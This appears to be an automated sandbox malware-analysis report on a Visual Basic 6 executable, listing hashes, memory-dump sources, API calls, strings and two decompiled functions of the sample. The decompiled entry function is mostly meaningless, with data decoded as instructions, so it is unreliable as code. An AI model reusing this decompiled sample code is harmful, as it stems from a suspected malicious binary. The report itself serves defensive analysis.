Instruction Fuzzy Hash: AB81C7B2805608ABEBC49F34C48979E7BF0FF103A8F962419FC8642591D7BC89C5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02217A2E, Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4391703e6326739b03852d7d8bb3e4e56fc8f1f60b427e94c291de728666a495
Instruction ID: 5c81507da5ff908df3b853de4fca445cb2facd8a07dfb89460301b167ac35ef9
Opcode Fuzzy Hash: 4391703e6326739b03852d7d8bb3e4e56fc8f1f60b427e94c291de728666a495
Instruction Fuzzy Hash: 81D1F070620716EFE7149FA8CC90FE5B3E5FF18314F154229EC5997288CBB1A894CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0042D3B3, Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0042D3B3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v40;
				char _v44;
				char _v60;
				signed int _v84;
				char _v92;
				char* _v116;
				intOrPtr _v124;
				signed int _v144;
				signed int _v152;
				signed int _t59;
				char* _t62;
				char* _t68;
				signed int _t69;
				signed int _t70;
				void* _t94;
				intOrPtr _t96;

				 *[fs:0x0] = _t96;
				L004015F0();
				_v12 = _t96;
				_v8 = 0x401490;
				L00401794();
				_v84 = L"VB.OptionButton";
				_v92 = 8;
				_v116 = L"Anitas5";
				_v124 = 8;
				_t59 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v44, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, __ecx, __ecx, _t94);
				asm("fclex");
				_v144 = _t59;
				if(_v144 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x4031f4);
					_push(_a4);
					_push(_v144);
					L00401800();
					_v152 = _t59;
				}
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v44);
				_t62 =  &_v60;
				_push(_t62); // executed
				L004017B8(); // executed
				_push(_t62);
				L004017BE();
				_push(_t62);
				_push( &_v24);
				L004017C4();
				L004017FA();
				L00401824();
				_v84 = L"Angularize8";
				_v92 = 8;
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Caption");
				_push(_v24);
				L0040171C();
				_v84 = 0x2705;
				_v92 = 2;
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v24);
				L0040171C();
				_v84 = 0x48c2;
				_v92 = 2;
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v24);
				L0040171C();
				_v84 = _v84 | 0xffffffff;
				_v92 = 0xb;
				_push(0x10);
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v24);
				L0040171C();
				_v84 = 0x403868;
				_v92 = 0x8008;
				_push(0);
				_push(L"Caption");
				_push(_v24);
				_t68 =  &_v60;
				_push(_t68);
				L004017B8();
				_push(_t68);
				_t69 =  &_v92;
				_push(_t69);
				L00401716();
				_v144 = _t69;
				L00401824();
				_t70 = _v144;
				if(_t70 != 0) {
					L00401710();
				}
				_push(0x42d5d8);
				L004017FA();
				L00401824();
				return _t70;
			}

0x0042d3c4
0x0042d3d0
0x0042d3d8
0x0042d3db
0x0042d3e8
0x0042d3ed
0x0042d3f4
0x0042d3fb
0x0042d402
0x0042d415
0x0042d41b
0x0042d41d
0x0042d42a
0x0042d44c
0x0042d42c
0x0042d42c
0x0042d431
0x0042d436
0x0042d439
0x0042d43f
0x0042d444
0x0042d444
0x0042d453
0x0042d456
0x0042d460
0x0042d461
0x0042d462
0x0042d463
0x0042d464
0x0042d467
0x0042d471
0x0042d472
0x0042d473
0x0042d474
0x0042d475
0x0042d477
0x0042d47c
0x0042d47f
0x0042d482
0x0042d483
0x0042d48b
0x0042d48c
0x0042d491
0x0042d495
0x0042d496
0x0042d49e
0x0042d4a6
0x0042d4ab
0x0042d4b2
0x0042d4b9
0x0042d4bc
0x0042d4c6
0x0042d4c7
0x0042d4c8
0x0042d4c9
0x0042d4ca
0x0042d4cf
0x0042d4d2
0x0042d4d7
0x0042d4de
0x0042d4e5
0x0042d4e8
0x0042d4f2
0x0042d4f3
0x0042d4f4
0x0042d4f5
0x0042d4f6
0x0042d4fb
0x0042d4fe
0x0042d503
0x0042d50a
0x0042d511
0x0042d514
0x0042d51e
0x0042d51f
0x0042d520
0x0042d521
0x0042d522
0x0042d527
0x0042d52a
0x0042d52f
0x0042d533
0x0042d53a
0x0042d53d
0x0042d547
0x0042d548
0x0042d549
0x0042d54a
0x0042d54b
0x0042d550
0x0042d553
0x0042d558
0x0042d55f
0x0042d566
0x0042d568
0x0042d56d
0x0042d570
0x0042d573
0x0042d574
0x0042d57c
0x0042d57d
0x0042d580
0x0042d581
0x0042d586
0x0042d590
0x0042d595
0x0042d59e
0x0042d5a0
0x0042d5a0
0x0042d5a5
0x0042d5ca
0x0042d5d2
0x0042d5d7

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042D3D0
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042D3E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004031F4,00000218), ref: 0042D43F
__vbaChkstk.MSVBVM60(00000000,?,004031F4,00000218), ref: 0042D456
__vbaChkstk.MSVBVM60(00000000,?,004031F4,00000218), ref: 0042D467
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 0042D483
__vbaObjVar.MSVBVM60(00000000), ref: 0042D48C
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0042D496
__vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 0042D49E
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0042D4A6
__vbaChkstk.MSVBVM60 ref: 0042D4BC
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 0042D4D2
__vbaChkstk.MSVBVM60(?,Caption), ref: 0042D4E8
__vbaLateMemSt.MSVBVM60(?,Left,?,Caption), ref: 0042D4FE
__vbaChkstk.MSVBVM60(?,Left,?,Caption), ref: 0042D514
__vbaLateMemSt.MSVBVM60(?,Top,?,Left,?,Caption), ref: 0042D52A
__vbaChkstk.MSVBVM60(?,Top,?,Left,?,Caption), ref: 0042D53D
__vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left,?,Caption), ref: 0042D553
__vbaLateMemCallLd.MSVBVM60(00000000,?,Caption,00000000,?,Visible,?,Top,?,Left,?,Caption), ref: 0042D574
__vbaVarTstEq.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 0042D581
__vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 0042D590
__vbaEnd.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 0042D5A0
__vbaFreeObj.MSVBVM60(0042D5D8,?,00000000,?,?,00000000,00000000), ref: 0042D5CA
__vbaFreeVar.MSVBVM60(0042D5D8,?,00000000,?,?,00000000,00000000), ref: 0042D5D2

Strings

Anitas5, xrefs: 0042D3FB
Angularize8, xrefs: 0042D4AB
VB.OptionButton, xrefs: 0042D3ED
Add, xrefs: 0042D477
Caption, xrefs: 0042D4CA, 0042D568
Left, xrefs: 0042D4F6
Visible, xrefs: 0042D54B
Top, xrefs: 0042D522

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Late$Free$Call$AddrefCheckHresult
String ID: Add$Angularize8$Anitas5$Caption$Left$Top$VB.OptionButton$Visible
API String ID: 4274921479-3416331652
Opcode ID: 2820be9b82dbfce52d1505bb359ff7213ed3c710efafee3c091d3f8b2ba889b4
Instruction ID: b21cf7a8186064af1d8ced0a32444a219b2ebae47d9e95a265250cc72cd30797
Opcode Fuzzy Hash: 2820be9b82dbfce52d1505bb359ff7213ed3c710efafee3c091d3f8b2ba889b4
Instruction Fuzzy Hash: AA518371C00648AADF11EFD5CC46BCEBBB9BF05708F10442AB4007F1E2DBB95A859B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040186C, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

C-Code - Quality: 72%

			_entry_(signed int __eax, signed char __ebx, void* __ecx, void* __edx, signed int __edi, void* __esi, void* __fp0, char _a1, intOrPtr _a10, char _a29, intOrPtr _a44, intOrPtr _a45, char _a64, intOrPtr _a83, char _a108, intOrPtr _a110, char _a749797440, intOrPtr _a756613184) {
				char _v1;
				short _v28;
				char _v44;
				void* _v48;
				char _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				char _v76;
				char _v92;
				void* _v100;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				short _v160;
				signed short _t428;
				signed int _t429;
				intOrPtr* _t430;
				signed char _t432;
				void* _t433;
				intOrPtr* _t435;
				intOrPtr* _t437;
				void* _t438;
				intOrPtr* _t440;
				intOrPtr* _t441;
				intOrPtr* _t442;
				intOrPtr* _t444;
				intOrPtr* _t445;
				intOrPtr* _t446;
				intOrPtr* _t447;
				intOrPtr* _t449;
				intOrPtr* _t450;
				intOrPtr* _t452;
				intOrPtr* _t454;
				intOrPtr* _t456;
				intOrPtr* _t457;
				intOrPtr* _t459;
				intOrPtr* _t460;
				signed char _t462;
				intOrPtr* _t465;
				void* _t466;
				signed char _t468;
				signed int _t469;
				signed char _t470;
				signed int _t471;
				intOrPtr* _t472;
				void* _t473;
				signed int _t474;
				intOrPtr* _t475;
				intOrPtr* _t476;
				intOrPtr* _t478;
				intOrPtr* _t479;
				signed int _t480;
				intOrPtr* _t481;
				signed char _t482;
				signed char _t483;
				void* _t484;
				signed char _t485;
				signed char _t486;
				intOrPtr* _t488;
				signed int _t489;
				signed int _t490;
				signed char _t492;
				signed int _t494;
				signed char _t495;
				intOrPtr* _t496;
				signed int _t498;
				signed char _t500;
				signed int _t503;
				signed int _t504;
				signed char _t507;
				signed char _t508;
				void* _t509;
				intOrPtr* _t521;
				intOrPtr* _t522;
				void* _t523;
				signed char _t524;
				signed char _t525;
				signed char _t527;
				intOrPtr* _t529;
				signed char _t530;
				intOrPtr* _t531;
				intOrPtr* _t532;
				intOrPtr* _t533;
				intOrPtr* _t534;
				void* _t536;
				signed char _t538;
				signed int _t540;
				signed char _t542;
				intOrPtr* _t544;
				intOrPtr* _t545;
				intOrPtr* _t546;
				intOrPtr* _t547;
				intOrPtr* _t548;
				signed int _t549;
				void* _t554;
				void* _t555;
				void* _t558;
				void* _t562;
				void* _t566;
				void* _t568;
				void* _t571;
				void* _t572;
				intOrPtr* _t574;
				void* _t575;
				void* _t576;
				intOrPtr* _t577;
				void* _t578;
				void* _t579;
				intOrPtr* _t580;
				void* _t583;
				void* _t584;
				intOrPtr* _t585;
				void* _t587;
				void* _t588;
				intOrPtr* _t589;
				void* _t591;
				void* _t592;
				intOrPtr* _t593;
				intOrPtr* _t594;
				void* _t595;
				void* _t596;
				intOrPtr* _t597;
				void* _t598;
				void* _t599;
				intOrPtr* _t600;
				void* _t601;
				void* _t602;
				intOrPtr* _t603;
				signed int _t610;
				char* _t616;
				short _t617;
				char* _t619;
				char* _t621;
				signed int _t628;
				char* _t632;
				signed int _t635;
				void* _t641;
				intOrPtr* _t645;
				intOrPtr* _t648;
				signed int _t650;
				void* _t651;
				signed int _t652;
				intOrPtr* _t653;
				signed int _t655;
				signed int _t656;
				void* _t657;
				intOrPtr* _t659;
				signed char _t660;
				signed char _t662;
				signed int _t663;
				signed char _t669;
				intOrPtr* _t670;
				void* _t673;
				intOrPtr* _t674;
				void* _t675;
				intOrPtr* _t676;
				void* _t678;
				signed char _t691;
				intOrPtr* _t692;
				intOrPtr* _t693;
				signed char _t697;
				void* _t698;
				intOrPtr* _t713;
				intOrPtr* _t717;
				signed int _t718;
				intOrPtr* _t719;
				signed int _t720;
				void* _t721;
				void* _t723;
				void* _t724;
				void* _t725;
				intOrPtr* _t726;
				intOrPtr* _t727;
				intOrPtr* _t729;
				intOrPtr* _t730;
				intOrPtr* _t731;
				signed int _t748;
				signed int _t756;
				signed int _t757;
				signed int _t768;
				intOrPtr* _t769;
				void* _t770;
				void* _t772;
				void* _t773;
				void* _t774;
				void* _t776;
				void* _t777;
				void* _t778;
				intOrPtr _t779;
				void* _t784;
				intOrPtr _t787;
				signed int _t794;
				signed int _t797;
				signed int _t799;
				signed int _t818;
				intOrPtr _t846;

				_t734 = __edi;
				_t669 = __ebx;
				_push("VB5!6&*"); // executed
				L00401866(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t428 = __eax + 1;
				 *_t428 =  *_t428 + _t428;
				 *_t428 =  *_t428 + _t428;
				 *_t428 =  *_t428 + _t428;
				 *((intOrPtr*)(__ecx - 0x3a59ba)) =  *((intOrPtr*)(__ecx - 0x3a59ba)) + __ebx;
				_t748 = __esi - 1;
				_t691 = 0x4a;
				asm("scasd");
				_t429 = _t428 | 0x0000f3cf;
				asm("fyl2xp1");
				asm("adc eax, 0x0");
				 *_t429 =  *_t429 + _t429;
				 *_t429 =  *_t429 + _t429;
				 *_t429 =  *_t429 + _t429;
				_t717 = __edx + 1;
				 *_t748 =  *_t748 + _t429;
				_push(_t429);
				 *_t717 =  *_t717 + 0x70;
				_t787 =  *_t717;
				if(_t787 >= 0) {
					if(_t787 >= 0) {
						_t756 =  &_v1;
						if(_t756 < 0) {
							 *_t429 =  *_t429 + _t429;
						}
						 *_t429 =  *_t429 + _t429;
						_t768 = _t768 - 1;
						 *_t429 =  *_t429 ^ _t429;
						 *_t734 =  *_t734 | _t691;
						if( *_t734 <= 0) {
							asm("adc byte [esi-0x5eba1fe9], 0xd0");
							_t691 = 0xae;
							_t734 = _t429;
							_t717 = 0xa94dac2c;
							_t669 = _t669 ^  *0xFFFFFFFFB711D014;
							_t429 = 0xfffffffff19166d2;
							asm("stosb");
							 *0x5CDE5C92 =  *((intOrPtr*)(0x5cde5c92)) + 0xfffffffff19166d2;
						}
						_t9 = _t429;
						_t429 = _t669;
						_t669 = _t9;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
						 *_t429 =  *_t429 + _t429;
					}
					 *_t429 =  *_t429 + _t429;
					 *_t429 =  *_t429 + _t429;
					 *_t429 =  *_t429 + _t429;
					_t717 = _t717 + _t691;
					 *_t429 =  *_t429 + _t429;
					 *_t734 =  *_t734 + _t669;
				}
				 *_t429 =  *_t429 + _t429;
				 *_t429 =  *_t429 + _t429;
				asm("adc eax, [eax]");
				_t718 = _t717 + 1;
				_t794 = _t718;
				asm("popad");
				asm("a16 popad");
				asm("popad");
				if(_t794 < 0) {
					L13:
					_t429 = _t429 |  *_t429;
					_t797 = _t429;
					if(_t797 != 0) {
						goto L22;
					} else {
						if(_t797 < 0) {
							goto L23;
						} else {
							asm("a16 gs outsb");
							goto L16;
						}
					}
				} else {
					if(_t794 >= 0) {
						L16:
						asm("outsb");
						 *[gs:0x1ba81ec8] =  *[gs:0x1ba81ec8] + _t429;
						_t663 = _t429;
						 *_t669 =  *_t669 + 1;
						asm("das");
						 *_t663 =  *_t663 + _t663;
						 *_t718 =  *_t718 + _t663;
						 *_t663 =  *_t663 | _t663;
						_t734 = 0x1201ef03;
						if(0x1201ef04 < 0) {
							goto L26;
						} else {
							_push(es);
							 *((intOrPtr*)(_t663 + _t663)) =  *((intOrPtr*)(_t663 + _t663)) + _t691;
							_t718 = _t718 + 1;
							_push(_t718);
							_push(_t748);
							_push(_t718);
							_t768 = _t768 + 1;
							_t748 = _t748 - 1;
							_push(_t718);
							_t756 =  &_a1;
							_push(_t669);
							 *0xff016f8 =  *0xff016f8 + _t663;
							_t432 = _t663 + 0x2e03ff00;
							 *_t432 =  *_t432 + _t432;
							 *_t669 =  *_t669 + _t432;
							 *_t432 =  *_t432 | _t432;
							_t734 = 0x1201ef03;
							_t799 = 0x1201ef04;
							if(0x1201ef04 < 0) {
								goto L30;
							} else {
								_t756 =  *0x1201EF72 * 0x343165;
								_push(es);
								 *_t669 =  *_t669 + _t691;
								_t26 =  &_a108;
								 *_t26 = _a108 + _t718;
								_t846 =  *_t26;
								if(_t846 <= 0) {
									goto L33;
								} else {
									if(_t846 >= 0) {
										goto L34;
									} else {
										if(_t846 < 0) {
											goto L35;
										} else {
											goto L21;
										}
									}
								}
							}
						}
					} else {
						_push(0x6c);
						_t768 =  *(_t734 + 0x68) * 0x736465;
						_t432 = _t429 | 0x4b001001;
						_push(_t756);
						_push(_t718);
						_push(_t768);
						_t713 = _t691 - 1 + 1 - 1;
						_push(_t669);
						 *_t713 =  *_t713 + _t669;
						 *_t432 =  *_t432 + _t432;
						_t718 = _t718 + 1;
						 *((intOrPtr*)(_t432 + _t718)) =  *((intOrPtr*)(_t432 + _t718)) + _t432;
						 *((intOrPtr*)(_t669 + 0x4f)) =  *((intOrPtr*)(_t669 + 0x4f)) + _t713;
						_push( &_a1);
						_push(_t718);
						_push(_t768);
						_t691 = _t713 - 1 + 1 - 1;
						_t756 =  &_a1;
						_t748 = _t748 - 1 + 1 - 0xffffffffffffffff + 1;
						_push(_t669);
						 *0x1f26 =  *0x1f26 + _t718;
						asm("sbb [eax+eax], ebx");
						 *((intOrPtr*)(_t432 + 0x2700000f)) =  *((intOrPtr*)(_t432 + 0x2700000f)) + _t432;
						asm("adc [eax], eax");
						 *((intOrPtr*)(_t432 + _t432 + 0x46)) =  *((intOrPtr*)(_t432 + _t432 + 0x46)) + _t432;
						 *0x1000000 =  *0x1000000 + _t756;
						 *_t432 =  *_t432 | _t432;
						_t734 = _t734 - 1 + 1 - 1 + 1 - 1 + _t734 - 1 + 1 - 1 + 1 - 1 - 1;
						if(_t734 < 0) {
							L21:
							_t429 = _t432 ^ 0x16f80500;
							 *_t734 =  *_t734 + _t691;
							_t734 = 0x1201ef04;
							L22:
							_t429 = _t429 + 0xef;
							L23:
							 *_t718 =  *_t718 + _t718;
							_t430 = _t429 +  *_t429;
							 *_t669 =  *_t669 + 1;
							asm("das");
							 *_t430 =  *_t430 + _t430;
							 *((intOrPtr*)(_t691 + _t691)) =  *((intOrPtr*)(_t691 + _t691)) + _t430;
							_t30 = _t734 + 0x70;
							 *_t30 =  *((intOrPtr*)(_t734 + 0x70)) + _t691;
							if( *_t30 >= 0) {
								L37:
								_t430 = _t430 - 1;
								asm("gs outsb");
								asm("popa");
								asm("insb");
								asm("gs outsb");
								goto L38;
							} else {
								asm("outsd");
								asm("outsb");
								 *[gs:0xc010600] =  *[gs:0xc010600] ^ _t748;
								_t32 = _t669 + 0x61;
								 *_t32 =  *((intOrPtr*)(_t669 + 0x61)) + _t430;
								if( *_t32 < 0) {
									L38:
									asm("gs outsb");
									 *[ss:0xf0016f8] =  *[ss:0xf0016f8] + _t430;
									 *_t430 =  *_t430 + _t430;
									 *_t669 =  *_t669 + 1;
									_t432 = _t430 -  *_t430;
									 *_t432 =  *_t432 + _t432;
									_pop(es);
									 *_t432 =  *_t432 | _t432;
									_t734 = 0x1201ef03;
									if(0x1201ef04 >= 0) {
										_push(es);
										 *_t432 =  *_t432 + _t691;
										goto L40;
									}
								} else {
									L26:
									_t768 =  *(_t669 + _t734) * 0x16f805;
									 *_t718 =  *_t718 + _t718;
									_t662 =  *((short*)(_t734 + _t756 * 8)) +  *((intOrPtr*)( *((short*)(_t734 + _t756 * 8))));
									 *_t669 =  *_t669 + 1;
									 *_t662 =  *_t662 ^ _t662;
									 *_t662 =  *_t662 + _t662;
									_t432 = _t662 + 0x704f0009;
									if(_t432 >= 0) {
										L40:
										 *_t432 =  *_t432 | _t432;
										_t748 = _t748 + 1;
										_push(_t718);
										_push(_t718);
										_t756 =  &_a1;
										_push(_t718);
										 *0xf0016f8 =  *0xf0016f8 + _t432;
										_t734 = 0x1201ef04;
										goto L41;
									} else {
										asm("outsd");
										asm("outsb");
										 *[gs:esi] =  *[gs:esi] ^ _t748;
										 *_t748 =  *_t748 + _t432;
										 *0x65764f00 =  *0x65764f00 + _t691;
										_t799 =  *0x65764f00;
										if(_t799 < 0) {
											L42:
											asm("sbb al, [eax]");
											 *_t653 =  *_t653 + _t653;
											goto L43;
										} else {
											if(_t799 == 0) {
												L43:
												 *_t653 =  *_t653 + _t691;
												_pop(es);
												_a110 = _a110 + _t718;
												goto L44;
											} else {
												asm("gs insb");
												L30:
												if(_t799 >= 0) {
													L41:
													_t653 = _t432 + 0xef;
													 *_t718 =  *_t718 + _t718;
													_push(es);
													_t669 = _t669 + _t669 +  *_t718;
													goto L42;
												} else {
													if(_t799 < 0) {
														L44:
														asm("outsb");
														_push(_t669);
														_push(0x657061);
														_push(ss);
														_push(es);
														_t669 = _t669 + 1;
														_push(es);
														_t655 =  *_t718;
														 *_t655 =  *_t655 - _t691;
														 *_t718 =  *_t718 + 1;
														_t656 = _t655;
														_push(es);
														 *_t656 =  *_t656 + _t656;
														 *((intOrPtr*)(_t748 + 0x40 + _t656 * 2)) =  *((intOrPtr*)(_t748 + 0x40 + _t656 * 2)) + _t656;
														goto L45;
													} else {
														 *0xf0016f8 =  *0xf0016f8 + _t432;
														L33:
														_push(ss);
														 *_t734 =  *_t734 + _t691;
														L34:
														 *_t432 =  *_t432 + _t432;
														 *_t669 =  *_t669 + 1;
														asm("das");
														 *_t432 =  *_t432 + _t432;
														L35:
														 *_t432 =  *_t432 + _t432;
														_push(es);
														 *_t432 =  *_t432 | _t432;
														_t734 = 0x1201ef03;
														if(0x1201ef03 < 0) {
															L45:
															_t748 = _t748 + 1;
															_t657 = _t656 + 1;
															 *_t691 =  *_t691 + _t657;
															 *_t718 =  *_t718 + _t657;
															_t659 = _t657 + _t718 - 0x40;
															 *_t659 =  *_t659 + _t659;
															asm("invalid");
															asm("invalid");
															asm("invalid");
															asm("invalid");
															 *_t659 =  *_t659 + _t659;
															 *_t659 =  *_t659 + _t659;
															asm("movsb");
															_t660 = _t659 + 1;
															 *((intOrPtr*)(_t660 + _t718 * 2)) =  *((intOrPtr*)(_t660 + _t718 * 2)) + _t669;
															_t669 = _t669 + 1;
															 *_t660 =  *_t660 + _t660;
															 *_t660 =  *_t660 + _t660;
															 *_t660 =  *_t660 + _t669;
															asm("daa");
															_t432 = _t660 &  *_t660;
															 *_t432 =  *_t432 + _t432;
															 *_t432 =  *_t432 + _t432;
														} else {
															_t756 =  *0x1201EF71 * 0x373165;
															_push(es);
															 *((intOrPtr*)(_t432 + _t432)) =  *((intOrPtr*)(_t432 + _t432)) + _t691;
															goto L37;
														}
													}
												}
											}
										}
									}
								}
							}
						} else {
							_t756 =  *(_t734 + 0x6e) * 0x323165;
							_push(es);
							 *_t718 =  *_t718 + _t691;
							goto L13;
						}
					}
				}
				 *_t432 =  *_t432 + _t432;
				 *_t432 =  *_t432 + _t432;
				 *_t432 =  *_t432 + _t432;
				 *_t432 =  *_t432 + _t432;
				 *_t669 =  *_t669 & _t669;
				_t433 = _t432 + 1;
				 *_t691 =  *_t691 + _t433;
				 *_t691 =  *_t691 + _t691;
				_t435 = _t433 + _t718 - 0x40;
				 *_t435 =  *_t435 + _t435;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t435 =  *_t435 + _t435;
				 *_t435 =  *_t435 + _t435;
				asm("hlt");
				asm("das");
				_t437 = _t435 + 1 + _t435 + 1;
				_push(_t437);
				_t670 = _t669 + 1;
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 + _t437;
				 *((intOrPtr*)(_t437 + 0x40)) =  *((intOrPtr*)(_t437 + 0x40)) + _t691;
				_push(ds);
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 + _t437;
				 *_t437 =  *_t437 + _t437;
				 *((intOrPtr*)(_t437 + 0x1b)) =  *((intOrPtr*)(_t437 + 0x1b)) + _t670;
				_t438 = _t437 + 1;
				 *_t691 =  *_t691 + _t438;
				 *_t670 =  *_t670 + _t438;
				_t440 = _t438 + _t718 - 0x40;
				 *_t440 =  *_t440 + _t440;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t440 =  *_t440 + _t440;
				 *_t440 =  *_t440 + _t440;
				asm("aam 0x2e");
				_t441 = _t440 + 1;
				 *((intOrPtr*)(_t441 + 0x50)) =  *((intOrPtr*)(_t441 + 0x50)) + _t441;
				 *_t441 =  *_t441 + _t441;
				 *_t441 =  *_t441 + _t441;
				_t442 = _t441 + _t691;
				_t692 = _t691 + 1;
				_push(ds);
				 *_t442 =  *_t442 + _t442;
				 *_t442 =  *_t442 + _t442;
				 *_t442 =  *_t442 + _t442;
				 *_t442 =  *_t442 + _t442;
				 *_t442 =  *_t442 + _t442;
				 *_t442 =  *_t442 + _t442;
				 *((intOrPtr*)(_t442 + 0x100401b)) =  *((intOrPtr*)(_t442 + 0x100401b)) + _t718;
				 *((intOrPtr*)(_t442 + _t442)) =  *((intOrPtr*)(_t442 + _t442)) + _t442;
				asm("lock sub eax, 0x40");
				 *_t442 =  *_t442 + _t442;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t442 =  *_t442 + _t442;
				 *_t442 =  *_t442 + _t442;
				_t444 = _t442 + 0x30;
				 *((intOrPtr*)(_t444 + 0x50)) =  *((intOrPtr*)(_t444 + 0x50)) + _t718;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				 *((intOrPtr*)(_t444 + 0x1e41)) =  *((intOrPtr*)(_t444 + 0x1e41)) + _t692;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				_t445 = _t444 + _t692;
				asm("sbb eax, [eax]");
				 *_t445 =  *_t445 + _t445;
				_t446 = _t445 + 0x402df000;
				 *_t446 =  *_t446 + _t446;
				 *_t446 =  *_t446 + _t446;
				_t673 = _t670 + 2 + _t670 + 2;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t446 =  *_t446 + 1;
				 *_t446 =  *_t446 + _t446;
				 *((intOrPtr*)(_t734 + _t756)) =  *((intOrPtr*)(_t734 + _t756)) + _t718;
				_t447 = _t446 + 1;
				 *((intOrPtr*)(_t447 + 0x4350)) =  *((intOrPtr*)(_t447 + 0x4350)) + _t447;
				 *_t447 =  *_t447 + _t447;
				 *((intOrPtr*)(_t447 + 0x41)) =  *((intOrPtr*)(_t447 + 0x41)) + _t692;
				_push(ds);
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				 *_t447 =  *_t447 + _t447;
				asm("sbb al, 0x40");
				 *_t692 =  *_t692 + _t447;
				 *_t748 =  *_t748 + _t447;
				_t449 = _t447 + _t718 - 0x40;
				 *_t449 =  *_t449 + _t449;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t449 =  *_t449 + _t449;
				 *_t449 =  *_t449 + _t449;
				asm("das");
				_t450 = _t449 + 1;
				 *((intOrPtr*)(_t450 + 0x4350)) =  *((intOrPtr*)(_t450 + 0x4350)) + _t718;
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t692;
				_t693 = _t692 + 1;
				_push(ds);
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t450;
				 *_t450 =  *_t450 + _t673;
				asm("sbb al, 0x40");
				 *_t693 =  *_t693 + _t450;
				 *_t734 =  *_t734 + _t450;
				_t452 = _t450 + _t718 - 0x40;
				 *_t452 =  *_t452 + _t452;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t452 =  *_t452 + _t452;
				 *_t452 =  *_t452 + _t452;
				_t769 = _t452;
				asm("das");
